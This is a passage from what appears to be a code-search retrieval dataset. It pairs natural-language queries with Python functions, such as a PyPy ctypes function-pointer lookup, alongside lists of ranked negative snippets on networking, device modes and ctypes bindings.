(\"\\nauth_algs=%s\" % auth_algs) # 1=wpa, 2=wep, 3=both\n if(wpa!=None):\n self.cmd = self.cmd + (\"\\nwpa=%s\" % wpa) # WPA2 only\n if(wpa_key_mgmt!=None):\n self.cmd = self.cmd + (\"\\nwpa_key_mgmt=%s\" % wpa_key_mgmt ) \n if(rsn_pairwise!=None):\n self.cmd = self.cmd + (\"\\nrsn_pairwise=%s\" % rsn_pairwise) \n if(wpa_passphrase!=None):\n self.cmd = self.cmd + (\"\\nwpa_passphrase=%s\" % wpa_passphrase) \n \n #elif(len(self.baseStationName)>self.countAP and len(self.baseStationName) != 1):\n # \"\"\"From AP2\"\"\"\n # self.cmd = self.apcommand\n #self.cmd = self.cmd + \"\\n\"\n # self.cmd = self.cmd + (\"\\nbss=%s\" % self.newapif[self.nextIface]) # the interface used by the AP\n # if(self.ssid!=None):\n # self.cmd = self.cmd + (\"\\nssid=%s\" % self.ssid ) # the name of the AP\n #self.cmd = self.cmd + (\"\\nssid=%s\" % self.ssid) # the name of the AP\n # if(self.auth_algs!=None):\n # self.cmd = self.cmd + (\"\\nauth_algs=%s\" % self.auth_algs) # 1=wpa, 2=wep, 3=both\n # if(self.wpa!=None):\n # self.cmd = self.cmd + (\"\\nwpa=%s\" % self.wpa) # WPA2 only\n # if(self.wpa_key_mgmt!=None):\n # self.cmd = self.cmd + (\"\\nwpa_key_mgmt=%s\" % self.wpa_key_mgmt ) \n # if(self.rsn_pairwise!=None):\n # self.cmd = self.cmd + (\"\\nrsn_pairwise=%s\" % self.rsn_pairwise) \n # if(self.wpa_passphrase!=None):\n # self.cmd = self.cmd + (\"\\nwpa_passphrase=%s\" % self.wpa_passphrase) \n # self.countAP = len(self.baseStationName)\n # self.apcommand = \"\"\n return self.cmd", "def _turn_on_dev_mode(self):\n if self._device is not None:\n self._char_write(self._BLE_SERVICE_ANTI_DOS,\n [ord(c) for c in self._ANTI_DOS_MESSAGE])\n self._char_write(self._BLE_SERVICE_TX_POWER,\n [self._TX_POWER_VALUE])\n # Sending 0x01 to the wake service wakes the sphero.\n self._char_write(self._BLE_SERVICE_WAKE, [0x01])", "def choose_mode():\n print('Do you want to play in terminal/debug mode (\"t\") or in visual mode (\"v\")?')\n while True:\n user_input = input()\n if user_input.lower() == \"t\":\n print('You chose for terminal mode, the game will start now')\n return False\n elif user_input.lower() == \"v\":\n print('You chose for visual mode, the game will start in a new window')\n return True\n else:\n print(f'Your input: {user_input}, is not recognised, please try')", "def is_on(self) -> bool:\n return self._zone.data[\"mode\"] == \"override\" and self._zone.data[\"setpoint\"]", "def power_mode(self):\n if not self.eve_type.is_upwell_structure:\n return None\n\n if self.fuel_expires_at and self.fuel_expires_at > now():\n return self.PowerMode.FULL_POWER\n\n elif self.last_online_at:\n if self.last_online_at >= now() - timedelta(days=7):\n return self.PowerMode.LOW_POWER\n else:\n return self.PowerMode.ABANDONED\n\n elif self.state in {self.State.ANCHORING, self.State.ANCHOR_VULNERABLE}:\n return self.PowerMode.LOW_POWER\n\n else:\n return self.PowerMode.LOW_ABANDONED", "def _wireless_autoconnect(self):\n print \"No wired connection present, attempting to autoconnect\" + \\\n \"to wireless network\"\n if self.GetWirelessInterface() is None:\n print 'Autoconnect failed because wireless interface returned None'\n return\n for x, network in enumerate(self.LastScan):\n if bool(network[\"has_profile\"]):\n if self.debug_mode:\n print network[\"essid\"] + ' has profile'\n if bool(network.get('automatic')):\n print 'trying to automatically connect to...' + \\\n network[\"essid\"]\n self.ConnectWireless(x)\n time.sleep(1)\n return\n print \"Unable to autoconnect, you'll have to manually connect\"", "def _on_autonomous_enable(self) -> None:\n\n # XXX: FRC Dashboard compatibility\n # -> if you set it here, you're stuck using it. The FRC Dashboard\n # doesn't seem to have a default (nor will it show a default),\n # so the key will only get set if you set it.\n auto_mode = wpilib.SmartDashboard.getString(\"Auto Selector\", None)\n if auto_mode is not None and auto_mode in self.modes:\n logger.info(\"Using autonomous mode set by LabVIEW dashboard\")\n self.active_mode = self.modes[auto_mode]\n else:\n self.active_mode = self.chooser.getSelected()\n\n if self.active_mode is not None:\n logger.info(\"Enabling '%s'\", self.active_mode.MODE_NAME)\n self.active_mode.on_enable()\n else:\n logger.warning(\n \"No autonomous modes were selected, not enabling autonomous mode\"\n )", "def maintenance_mode():\n pass", "def _update_instance_type_for_local_mode(self):\n self.config[\"resource\"][\"private_resource\"][\"hosting_fleet\"][\"instance_type\"] = \"local\"\n self.config[\"resource\"][\"private_resource\"][\"training_fleet\"][\"instance_type\"] = \"local\"\n self.config[\"resource\"][\"private_resource\"][\"evaluation_fleet\"][\"instance_type\"] = \"local\"", "def do_set_online(self):\n controller_name = self._tel.csp.controller\n controller = con_config.get_device_proxy(controller_name, fast_load=True)\n self._log(f\"Setting adminMode for {controller_name} to '0' (ONLINE)\")\n controller.write_attribute(\"adminmode\", 0)\n for index in range(1, self.nr_of_subarrays + 1):\n subarray_name = self._tel.csp.subarray(index)\n subarray = con_config.get_device_proxy(subarray_name, fast_load=True)\n self._log(f\"Setting adminMode for {subarray_name} to '0' (ONLINE)\")\n subarray.write_attribute(\"adminmode\", 0)", "def test_ap_hs20_network_preference(dev, apdev):\n bssid = apdev[0]['bssid']\n params = hs20_ap_params()\n hostapd.add_ap(apdev[0]['ifname'], params)\n\n dev[0].hs20_enable()\n values = { 'realm': \"example.com\",\n 'username': \"hs20-test\",\n 'password': \"password\",\n 'domain': \"example.com\" }\n dev[0].add_cred_values(values)\n\n id = dev[0].add_network()\n dev[0].set_network_quoted(id, \"ssid\", \"home\")\n dev[0].set_network_quoted(id, \"psk\", \"12345678\")\n dev[0].set_network(id, \"priority\", \"1\")\n dev[0].request(\"ENABLE_NETWORK %s no-connect\" % id)\n\n dev[0].request(\"INTERWORKING_SELECT auto freq=2412\")\n ev = dev[0].wait_event([\"CTRL-EVENT-CONNECTED\"], timeout=15)\n if ev is None:\n raise Exception(\"Connection timed out\")\n if bssid not in ev:\n raise Exception(\"Unexpected network selected\")\n\n bssid2 = apdev[1]['bssid']\n params = hostapd.wpa2_params(ssid=\"home\", passphrase=\"12345678\")\n hostapd.add_ap(apdev[1]['ifname'], params)\n\n dev[0].request(\"INTERWORKING_SELECT auto freq=2412\")\n ev = dev[0].wait_event([\"CTRL-EVENT-CONNECTED\",\n \"INTERWORKING-ALREADY-CONNECTED\" ], timeout=15)\n if ev is None:\n raise Exception(\"Connection timed out\")\n if \"INTERWORKING-ALREADY-CONNECTED\" in ev:\n raise Exception(\"No roam to higher priority network\")\n if bssid2 not in ev:\n raise Exception(\"Unexpected network selected\")", "def networkMode(self):\n\n response = self.at.sendCommand(\"AT+CEREG?\")\n\n # If we failed to query the network mode, that's a paddlin'\n if not response:\n raise modem.AtError(response, \"Failed to query network mode\")\n\n lines = response.lines\n\n if len(lines) < 1:\n raise modem.AtError(response, \"Invalid network mode response\")\n\n fields = lines[0].split(\",\")\n\n # If there isn't at least the prefix and the current mode, that's a\n # paddlin'\n if len(fields) < 2:\n raise modem.AtError(response, \"Invalid network mode response\")\n\n try:\n return int(fields[1])\n\n except ValueError:\n raise modem.AtError(response, \"Invalid network mode\")", "def _is_device_active(self):\n return self.power_mode == STATE_ON", "def network_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkMode']]]:\n return pulumi.get(self, \"network_mode\")", "def turn_on(self, **kwargs):\n self.smartplug.turn_on()", "async def change_heatmode(self, newmode):\n if not self.connected:\n return\n\n # check for sanity\n if newmode > 2:\n return\n\n # this is a toggle switch, not on/off\n if self.heatmode == newmode:\n return\n\n # what we know:\n data = bytearray(9)\n data[0] = M_START\n data[1] = 7\n data[2] = mtypes[BMTS_CONTROL_REQ][0]\n data[3] = mtypes[BMTS_CONTROL_REQ][1]\n data[4] = mtypes[BMTS_CONTROL_REQ][2]\n data[5] = C_HEATMODE\n data[6] = 0x00 # who knows?\n data[7] = messages.Message.crc(data[1:7])\n data[8] = M_END\n\n # You can't put the spa in REST, it can BE in rest, but you cannot\n # force it into rest. It's a tri-state, but a binary switch.\n\n # calculate how many times to push the button\n if newmode == self.HEATMODE_READY:\n if (self.heatmode == self.HEATMODE_REST or\n self.heatmode == self.HEATMODE_RNR):\n self.writer.write(data)\n await self.writer.drain()\n await asyncio.sleep(0.5)\n\n if newmode == self.HEATMODE_REST or newmode == self.HEATMODE_RNR:\n if self.heatmode == self.HEATMODE_READY:\n self.writer.write(data)\n await self.writer.drain()\n await asyncio.sleep(0.5)", "def _toggle_server(self):\r\n\t\t_logger.debug(\"Toggle server button is pressed.\")\r\n\r\n\t\tif not comm_server.is_running():\r\n\t\t\tserver_ip = self.children[\"entry_IP\"].get()\r\n\t\t\tserver_port = int(self.children[\"entry_port\"].get())\r\n\t\t\tif not comm_server.start_server(server_ip, server_port):\r\n\t\t\t\treturn\r\n\t\t\tself._save_server_config(server_ip, server_port)\r\n\r\n\t\t\tself.children[\"btn_toggle_server\"].config(text = \"關閉伺服器\")\r\n\t\t\tself._update_connection_num(\"\")\r\n\t\telse:\r\n\t\t\tcomm_server.stop_server()\r\n\t\t\tself.children[\"btn_toggle_server\"].config(text = \"啟動伺服器\")\r\n\t\t\tself.children[\"label_connections\"].config(text = \"連接數: -/-\")", "def networkMode(self, networkMode):\n\n # Setting the network mode can take a bit of time, so give it 10 seconds\n # to finish\n response = self.at.sendCommand(f\"AT+CFUN={networkMode}\", timeout = 10)\n\n if not response:\n raise modem.AtError(response, \"Failed to set network mode\")", "def ethernet_on(self):\n if not self.healthy:\n self.health_check()\n if not self._ethernet_switch:\n raise errors.CapabilityNotReadyError(\n device_name=self._device_name,\n msg=\"Not set up for ethernet switching.\")\n self._ethernet_switch.switch_power.power_on(self.ethernet_port_number)", "def set_addressing_mode(mode):\n send_command(0x20)\n send_command(mode)", "def test_ap_hs20_network_preference2(dev, apdev):\n bssid2 = apdev[1]['bssid']\n params = hostapd.wpa2_params(ssid=\"home\", passphrase=\"12345678\")\n hostapd.add_ap(apdev[1]['ifname'], params)\n\n dev[0].hs20_enable()\n values = { 'realm': \"example.com\",\n 'username': \"hs20-test\",\n 'password': \"password\",\n 'domain': \"example.com\",\n 'priority': \"1\" }\n dev[0].add_cred_values(values)\n\n id = dev[0].add_network()\n dev[0].set_network_quoted(id, \"ssid\", \"home\")\n dev[0].set_network_quoted(id, \"psk\", \"12345678\")\n dev[0].request(\"ENABLE_NETWORK %s no-connect\" % id)\n\n dev[0].request(\"INTERWORKING_SELECT auto freq=2412\")\n ev = dev[0].wait_event([\"CTRL-EVENT-CONNECTED\"], timeout=15)\n if ev is None:\n raise Exception(\"Connection timed out\")\n if bssid2 not in ev:\n raise Exception(\"Unexpected network selected\")\n\n bssid = apdev[0]['bssid']\n params = hs20_ap_params()\n hostapd.add_ap(apdev[0]['ifname'], params)\n\n dev[0].request(\"INTERWORKING_SELECT auto freq=2412\")\n ev = dev[0].wait_event([\"CTRL-EVENT-CONNECTED\",\n \"INTERWORKING-ALREADY-CONNECTED\" ], timeout=15)\n if ev is None:\n raise Exception(\"Connection timed out\")\n if \"INTERWORKING-ALREADY-CONNECTED\" in ev:\n raise Exception(\"No roam to higher priority network\")\n if bssid not in ev:\n raise Exception(\"Unexpected network selected\")", "def is_host_on(self):\n status = False\n cmd = \"/usr/local/bin/wedge_power.sh status\"\n data = run_shell_cmd(cmd)\n Logger.info(\"[FSCD Testing] Executing cmd= [{}]\".format(cmd))\n Logger.info(\"[FSCD Testing] Received data= [{}]\".format(data))\n if \"on\" in data:\n status = True\n Logger.info(\"[FSCD Testing] userver power status {}\".format(status))\n return status", "async def test_set_away_mode_on(opp):\n await common.async_set_away_mode(opp, True, ENTITY_WATER_HEATER)\n state = opp.states.get(ENTITY_WATER_HEATER)\n assert state.attributes.get(\"away_mode\") == \"on\"", "def setMode(self, newmode=None):\n if newmode==None and self.mode: return\n \n # find it in my dictionary\n for k,v in self.items():\n if k.lower() == \"mode\":\n if newmode:\n self.mode = newmode\n self[k] = str(self.mode)\n else:\n self.mode = int(v)\n \n # it wasn't in the dictionary\n if newmode and not self.mode:\n self.mode = newmode\n self[\"MODE\"] = str(self.mode)\n \n if not self.mode:\n raise NetworkException(\"Supplink mode not set: \" + str(self))", "def spoof(self, mac, air=False):\n\t\t\n\t\tif air:\n\t\t\tos.system(\n\t\t\t\t'sudo '\n\t\t\t\t'/System/Library/PrivateFrameworks'\n\t\t\t\t'/Apple80211.framework/Versions'\n\t\t\t\t'/Current/Resources/airport -z'\n\t\t\t)\n\t\t\n\t\t_status = os.system('sudo ifconfig %s ether %s' % (self.id, mac))\n\t\t\n\t\treturn 'Interface %s (%s) => (%s)' % (self.id, self.mac, mac)", "async def async_turn_on(self):\n path = \"/ip/firewall/nat\"\n param = \".id\"\n value = None\n for uid in self._ctrl.data[\"nat\"]:\n if (\n self._ctrl.data[\"nat\"][uid][\"name\"]\n == f\"{self._data['protocol']}:{self._data['dst-port']}\"\n ):\n value = self._ctrl.data[\"nat\"][uid][\".id\"]\n\n mod_param = \"disabled\"\n mod_value = False\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n await self._ctrl.force_update()", "def is_on(self):\n return self._mower_status in [\n STATUS_EXECUTING_START, STATUS_OK_CHARGING,\n STATUS_OK_CUTTING, STATUS_OK_LEAVING, STATUS_OK_SEARCHING, STATUS_OK_CUTTING_MANUAL]", "async def async_step_wifi(self, info: Optional[dict] = None):\n errors = {}\n if info is not None:\n try:\n serial, credential, device_type = get_mqtt_info_from_wifi_info(\n info[CONF_SSID], info[CONF_PASSWORD]\n )\n except DysonFailedToParseWifiInfo:\n errors[\"base\"] = \"cannot_parse_wifi_info\"\n else:\n device_type_name = DEVICE_TYPE_NAMES[device_type]\n _LOGGER.debug(\"Successfully parse WiFi information\")\n _LOGGER.debug(\"Serial: %s\", serial)\n _LOGGER.debug(\"Device Type: %s\", device_type)\n _LOGGER.debug(\"Device Type Name: %s\", device_type_name)\n try:\n data = await self._async_get_entry_data(\n serial,\n credential,\n device_type,\n device_type_name,\n info.get(CONF_HOST),\n )\n except InvalidAuth:\n errors[\"base\"] = \"invalid_auth\"\n except CannotConnect:\n errors[\"base\"] = \"cannot_connect\"\n except CannotFind:\n errors[\"base\"] = \"cannot_find\"\n else:\n return self.async_create_entry(\n title=device_type_name,\n data=data,\n )\n\n info = info or {}\n return self.async_show_form(\n step_id=\"wifi\",\n data_schema=vol.Schema(\n {\n vol.Required(CONF_SSID, default=info.get(CONF_SSID, \"\")): str,\n vol.Required(\n CONF_PASSWORD, default=info.get(CONF_PASSWORD, \"\")\n ): str,\n vol.Optional(CONF_HOST, default=info.get(CONF_HOST, \"\")): str,\n }\n ),\n errors=errors,\n )", "def SetDefaultPerfMode(self):\n if not self._device.old_interface.IsRootEnabled():\n return\n product_model = self._device.GetProp('ro.product.model')\n governor_mode = {\n 'GT-I9300': 'pegasusq',\n 'Galaxy Nexus': 'interactive',\n 'Nexus 4': 'ondemand',\n 'Nexus 7': 'interactive',\n 'Nexus 10': 'interactive'\n }.get(product_model, 'ondemand')\n self._SetScalingGovernorInternal(governor_mode)\n self._ForceAllCpusOnline(False)", "def read_for_explore_run(self):\n b_data = self.client_sock.recv(1024)\n if b_data!=None and len(b_data)!=0:\n if b_data!=\"GRID\": # AUTO mode in android, to avoid flush cmd\n print \"Received from Android: %s\" % b_data\n if b_data==\"explore\":\n print_msg(self.name, \"Setting \\\"explore\\\" flag\")\n self.explore_start = True\n elif b_data==\"run\":\n print_msg(self.name, \"Setting \\\"run\\\" flag\")\n self.run_start = True\n else:\n pass", "def in_easy_mode(mode: str) -> bool:\n return mode == EASY", "def on_the_network_page_click_on_setting_on_the_global_configuration_card(driver):\n assert wait_on_element(driver, 7, '//h1[contains(.,\"Network\")]')\n assert wait_on_element(driver, 5, '//button[@ix-auto=\"button__globalSettings\"]', 'clickable')\n driver.find_element_by_xpath('//button[@ix-auto=\"button__globalSettings\"]').click()", "def ConnectWifi(SSID, pwd):\n import network\n sta_if = network.WLAN(network.STA_IF)\n if not sta_if.isconnected():\n DisplayMsg('Connecting to network...',8)\n sta_if.active(True)\n sta_if.connect(SSID, pwd)\n while not sta_if.isconnected():\n pass\n return True", "def mode_manual(self):\n if self.__check_mode_change():\n self.communications.set_status(\"Piloting Bot\")\n self.__check_move()", "def wpsConnect():\n \n SSID = \"none\"\n # scan networks on interface wlan0, to see some nice networks\n subprocess.check_output([\"wpa_cli\", \"-i\", \"wlan0\", \"scan\"]) \n sleep(1);\n \n #get and decode results\n wpa = subprocess.check_output([\"wpa_cli\", \"-i\", \"wlan0\", \"scan_results\"]).decode(\"UTF-8\")\n \n #parse response to get MAC address of router that has WPS-PBC state\n active_spot_reg = re.search(\"(([\\da-f]{2}:){5}[\\da-f]{2})(.*?)\\[WPS-PBC\\]\", wpa)\n \n #check if found any\n if not (active_spot_reg is None):\n if active_spot_reg.group(1):\n \n #connect via wps_pbc\n subprocess.check_output([\"wpa_cli\", \"-i\", \"wlan0\", \"wps_pbc\", active_spot_reg.group(1)])\n SSID = active_spot_reg.group(5)\n \n print(active_spot_reg.group(1) + \" \" + SSID)\n print(wpa)\n \n return(SSID)", "def enable_gprs(self):\n if not has_internet():\n try:\n if not self.is_power_on():\n self.turn_on_modem()\n except TimeoutError:\n self.disable_gprs()\n self.turn_off_modem() # restart modem\n self.turn_on_modem()\n time.sleep(1)\n os.system(\n 'sudo pon {}'.format(os.path.basename(self.ppp_config_file))\n )\n # wait 420 seconds for ppp to start, if not raise TimeoutError\n self.check_internet_connection()\n else:\n self._logger.info('The device is already connected to the internet!')", "def enable(self):\n # Netmiko reports enable and config mode as being enabled\n if not self.native.check_enable_mode():\n self.native.enable()\n # Ensure device is not in config mode\n if self.native.check_config_mode():\n self.native.exit_config_mode()\n\n log.debug(\"Host %s: Device enabled.\", self.host)" ]
[ "0.6191428", "0.60795987", "0.60477906", "0.5971737", "0.59445924", "0.58588445", "0.57119495", "0.570681", "0.57007", "0.5689363", "0.5664943", "0.5628451", "0.5603096", "0.5597446", "0.55574036", "0.55567616", "0.5528155", "0.55259633", "0.5525236", "0.5521546", "0.5498724", "0.54806113", "0.54776305", "0.54715896", "0.54531723", "0.5424893", "0.5418745", "0.54014814", "0.5397726", "0.5395694", "0.5393082", "0.5384797", "0.53837985", "0.53837985", "0.53809965", "0.5351186", "0.5349952", "0.53341883", "0.53162664", "0.5301294", "0.5289985", "0.52673656", "0.5261528", "0.52350014", "0.5234527", "0.5229608", "0.5215584", "0.5204775", "0.5199902", "0.5199776", "0.5194728", "0.5194076", "0.51851326", "0.5179236", "0.51687616", "0.5157182", "0.51549226", "0.51439995", "0.51433116", "0.51369345", "0.5124248", "0.51204705", "0.51197916", "0.51171803", "0.51139224", "0.5109543", "0.5093438", "0.50643015", "0.5059835", "0.50556666", "0.5054786", "0.50528735", "0.50486434", "0.5036808", "0.50358045", "0.50302047", "0.50250566", "0.5023944", "0.5023754", "0.50225794", "0.5016115", "0.50054806", "0.49994096", "0.49944633", "0.49833134", "0.49795946", "0.49792755", "0.49623707", "0.49594054", "0.4958652", "0.49570364", "0.495346", "0.49533245", "0.49491265", "0.4943222", "0.49398342", "0.49361455", "0.4930097", "0.4929987", "0.49286333" ]
0.71384984
0
Get a pointer for function name with provided argtypes and restype
def ptr(self, space, w_name, w_argtypes, w_restype, flags=FUNCFLAG_CDECL): resshape = unpack_resshape(space, w_restype) if resshape is None: w_resshape = space.w_None else: w_resshape = resshape argtypes_w = space.fixedview(w_argtypes) w_argtypes = space.newtuple(argtypes_w) w_key = space.newtuple([w_name, w_argtypes, w_resshape]) try: return space.getitem(self.w_cache, w_key) except OperationError as e: if e.match(space, space.w_KeyError): pass else: raise # Array arguments not supported directly (in C, an array argument # will be just a pointer). And the result cannot be an array (at all). argshapes = unpack_argshapes(space, w_argtypes) ffi_argtypes = [shape.get_basic_ffi_type() for shape in argshapes] if resshape is not None: ffi_restype = resshape.get_basic_ffi_type() else: ffi_restype = ffi_type_void if space.isinstance_w(w_name, space.w_text): name = space.text_w(w_name) try: ptr = self.cdll.getrawpointer(name, ffi_argtypes, ffi_restype, flags) except KeyError: raise oefmt(space.w_AttributeError, "No symbol %s found in library %s", name, self.name) except LibFFIError: raise got_libffi_error(space) elif (_MS_WINDOWS and space.isinstance_w(w_name, space.w_int)): ordinal = space.int_w(w_name) try: ptr = self.cdll.getrawpointer_byordinal(ordinal, ffi_argtypes, ffi_restype, flags) except KeyError: raise oefmt(space.w_AttributeError, "No symbol %d found in library %s", ordinal, self.name) except LibFFIError: raise got_libffi_error(space) else: raise oefmt(space.w_TypeError, "function name must be string or integer") w_funcptr = W_FuncPtr(space, ptr, argshapes, resshape) space.setitem(self.w_cache, w_key, w_funcptr) return w_funcptr
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_func(name, argtypes=None, restype=c_int, lib=libDE):\n logger.debug(\"Getting NewWordFinder API function: 'name': '{}', 'argtypes': '{}',\"\n \" 'restype': '{}'.\".format(name, argtypes, restype))\n func = getattr(lib, name)\n if argtypes is not None:\n func.argtypes = argtypes\n if restype is not c_int:\n func.restype = restype\n logger.debug(\"NewWordFinder API function '{}' retrieved.\".format(name))\n return func", "def fsig(\n arg_types: ArgTypes, name: Text, span: Span, ctx: DeduceCtx,\n parametric_bindings: Optional[ParametricBindings]\n) -> Tuple[ConcreteType, SymbolicBindings]:\n logging.vlog(5, 'Instantiating for builtin %r @ %s', name, span)\n _Checker(arg_types, name, span).len(2).is_array(0).is_fn(1, argc=1)\n t = arg_types[0].get_element_type() # pytype: disable=attribute-error\n u, symbolic_bindings = parametric_instantiator.instantiate_function(\n span, arg_types[1], (t,), ctx, parametric_bindings, {})\n return_type = ArrayType(u, arg_types[0].size) # pytype: disable=attribute-error\n return FunctionType(arg_types, return_type), symbolic_bindings", "def get_func_type(self, *args):\n return _ida_hexrays.cfuncptr_t_get_func_type(self, *args)", "def fptrunc(self, typ):", "def get_arg_name(args):\n names = []\n for arg in args:\n if type(arg).__name__ == 'ID':\n names.append(arg.name)\n elif type(arg).__name__ == 'UnaryOp':\n names.append(arg.expr.name)\n elif type(arg).__name__ == 'StructRef':\n #############################################\n # So far, we don't care about this situation:\n # fun(a->b)\n # POSSIBLE CODE HERE\n #############################################\n names.append(None)\n return names", "def _find_by_name(details: CallableDetails, name: str):\n arg = details.arg_by_name(name)\n if not arg:\n raise IncompatibleHandlerFactoryError(\n f\"Callable {details.obj!r} has no argument named {name}\"\n )\n return arg", "def cpp_funcname(self, name, argkinds=None):\n if isinstance(name, basestring):\n return name\n if argkinds is None:\n argkinds = [(Arg.NONE, None)] * (len(name) - 1)\n fname = name[0]\n cts = []\n for x, (argkind, argvalue) in zip(name[1:], argkinds):\n if argkind is Arg.TYPE:\n ct = self.cpp_type(x)\n elif argkind is Arg.LIT:\n ct = self.cpp_literal(x)\n elif isinstance(x, Number):\n ct = self.cpp_literal(x)\n else:\n try:\n ct = self.cpp_type(x) # guess it is a type\n except TypeError:\n ct = x # guess it is a variable\n cts.append(ct)\n fname += '' if 0 == len(cts) else \"< \" + \", \".join(cts) + \" >\"\n return fname", "def _init_signature(func_name, restype, argtypes):\n global cfi\n f = getattr(cfi, func_name)\n f.restype = restype\n f.argtypes = argtypes", "def infer_function_call(func, func_type, argtypes):\n from numba2 import phase\n\n if is_method(func_type):\n func = func_type.parameters[0]\n argtypes = [func_type.parameters[1]] + list(argtypes)\n else:\n func = func.const\n\n # TODO: Support recursion !\n\n if len(func.overloads) == 1 and not func.opaque:\n argtypes = fill_missing_argtypes(func.py_func, tuple(argtypes))\n\n env = fresh_env(func, argtypes)\n func, env = phase.typing(func, env)\n # env[\"numba.typing.restype\"]\n if func_type is None:\n func_type = env[\"numba.typing.signature\"]\n return func, func_type, env[\"numba.typing.restype\"]", "def infer_foreign_call(func, func_type, argtypes):\n\n if isinstance(func_type, type(ForeignFunction.type)):\n restype = func_type.parameters[-1]\n else:\n restype = func_type.restype\n assert restype\n\n expected_argtypes = func_type.parameters[:-1]\n\n if len(argtypes) != len(expected_argtypes):\n raise TypeError(\"Function %s requires %d argument(s), got %d\" % (\n func, len(argtypes), len(expected_argtypes)))\n\n # Make sure we have compatible types\n unify(zip(argtypes, expected_argtypes))\n\n return func, Function[expected_argtypes + (restype,)], restype", "def wrap_function(funcname, restype, argtypes):\n func = _lib.__getattr__(funcname)\n func.restype = restype\n func.argtypes = argtypes\n return func", "def _name_from_args(func, _, params):\n return \"{}_{}\".format(func.__name__, \"_\".join(str(arg) for arg in params.args))", "def test_vulkan_func_pointer() -> None:\n xml = \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <type category=\"funcpointer\">typedef void (VKAPI_PTR *\n <name>PFN_vkInternalAllocationNotification</name>)(\n <type>void</type>* pUserData,\n <type>size_t</type> size,\n <type>VkInternalAllocationType</type> allocationType,\n <type>VkSystemAllocationScope</type> allocationScope);</type>\n \"\"\"\n funcptr = funcptr_parser.parse(ET.fromstring(xml))\n\n assert isinstance(funcptr, internal_types.VulkanFunctionPtr)\n\n assert funcptr.typename == \"PFN_vkInternalAllocationNotification\"\n assert funcptr.return_type == \"void\"\n assert len(funcptr.arguments) == 4\n\n argument_names = list(funcptr.arguments.keys())\n\n assert argument_names[0] == \"pUserData\"\n assert funcptr.arguments[\"pUserData\"].argument_type == \"void*\"\n\n assert argument_names[1] == \"size\"\n assert funcptr.arguments[\"size\"].argument_type == \"size_t\"\n\n assert argument_names[2] == \"allocationType\"\n assert funcptr.arguments[\"allocationType\"].argument_type == \"VkInternalAllocationType\"\n\n assert argument_names[3] == \"allocationScope\"\n assert funcptr.arguments[\"allocationScope\"].argument_type == \"VkSystemAllocationScope\"", "def map_string2func(funcname, clss, compute_capability):\n if \"_get_\" + funcname not in globals():\n raise AttributeError(\"kernel type '\" + funcname + \"' not understood\")\n return globals()[\"_get_\" + funcname](clss, compute_capability)", "def get_apifunc(arg):\n if isinstance(arg, APIFunc):\n return arg\n\n if callable(arg):\n return APIFunc(arg)\n\n raise ValueError(\"Argument %s is neither apifunc nor callable\" % arg)", "def get_func_type(self, *args):\n return _ida_hexrays.cfunc_t_get_func_type(self, *args)", "def cython_funcname(self, name, argkinds=None):\n if isinstance(name, basestring):\n return name\n if argkinds is None:\n argkinds = [(Arg.NONE, None)] * (len(name) - 1)\n fname = name[0]\n cfs = []\n for x, (argkind, argvalue) in zip(name[1:], argkinds):\n if argkind is Arg.TYPE:\n cf = self.cython_functionname(x)[1]\n elif argkind is Arg.LIT:\n cf = self.cython_literal(x)\n elif argkind is Arg.VAR:\n cf = x\n elif isinstance(x, Number):\n cf = self.cython_literal(x)\n else:\n try:\n cf = self.cython_functionname(x)[1] # guess type\n except TypeError:\n cf = x # guess variable\n cfs.append(cf)\n fname += '' if 0 == len(cfs) else \"_\" + \"_\".join(cfs)\n return fname", "def lookup_func_from_fp(fp):\n return lookup_func(fp['m_funcId'])", "def get_type(args_str, entry_type):\r\n # The C-method-implementations accept self as the first argument,\r\n # so a one-argument method will be invoked with zero arguments in Python.\r\n no_args = 1 if entry_type == \"method\" else 0\r\n return (\"METH_NOARGS\" if len(args_str.split(\",\")) == no_args\r\n else \"METH_VARARGS\")", "def call_func_by_name(*args, func_name: str = None, **kwargs) -> Any:\r\n assert func_name is not None\r\n func_obj = get_obj_by_name(func_name)\r\n assert callable(func_obj)\r\n return func_obj(*args, **kwargs)", "def fsig(arg_types: ArgTypes, name: Text, span: Span, ctx: DeduceCtx,\n _: Optional[ParametricBindings]) -> ConcreteType:\n checker = _Checker(arg_types, name, span).len(2).is_bits(0).is_array(1)\n\n arg0 = arg_types[0]\n arg1 = arg_types[1]\n assert isinstance(arg1, ArrayType), arg1\n assert isinstance(arg1.size.value, int), arg1\n return_type = arg1.element_type\n checker.check_is_bits(return_type,\n 'Want arg 1 element type to be bits; got {0}')\n checker.check_is_len(arg1, arg0.size,\n 'bit width {target} must match {t} array size {t.size}')\n return FunctionType(arg_types, return_type)", "def getFunction(self, name: unicode) -> ghidra.program.model.listing.Function:\n ...", "def _build_comute_argtype(num_nd, num_nd_write):\n ret = [_xc_func_p, ctypes.c_size_t]\n ret += [_ndptr] * num_nd\n ret += [_ndptr_w] * num_nd_write\n return tuple(ret)", "def _getargs(fn_sig):\n params = fn_sig.parameters\n args = []\n for k, v in params.items():\n if (v.kind & v.POSITIONAL_OR_KEYWORD) == v.POSITIONAL_OR_KEYWORD:\n args.append(k)\n else:\n msg = \"%s argument type unsupported in jitclass\" % v.kind\n raise errors.UnsupportedError(msg)\n return args", "def __call__(fun_name):", "def function_name(parameters):", "def CALL(name, *args):\r\n funcname = 'is_' + name\r\n func = getattr(libueye, funcname)\r\n new_args = []\r\n for a in args: \r\n if isinstance (a, unicode):\r\n print name, 'argument',a, 'is unicode'\r\n new_args.append (str (a))\r\n else:\r\n new_args.append (a)\r\n return func(*new_args)", "def _get_function_ptr(self, name):\r\n func = _make_function_ptr_instance\r\n self._function_ptrs.setdefault(name, func(self, name))\r\n return self._function_ptrs[name]", "def get_builtin_function(function_name: str, args_list: List[str]) -> Callable[[object, dict], object]:\n # Check if it is a built-in function\n possible_function = [obj for name, obj in getmembers(BuiltinFunctions) if\n name == function_name and isfunction(obj)]\n\n if len(possible_function) == 1:\n return possible_function[0](*args_list)\n else:\n return None", "def _getZeroPtrTypeOrNone(stmnt):\n stmnt = _resolveSingleStatement(stmnt)\n if not isinstance(stmnt, CFuncCall): return\n base = stmnt.base\n if isinstance(base, CStatement):\n if not base.isCType(): return\n base = base.asType()\n if not isinstance(base, CPointerType): return\n assert len(stmnt.args) == 1\n arg = stmnt.args[0]\n assert isinstance(arg, CStatement)\n arg = 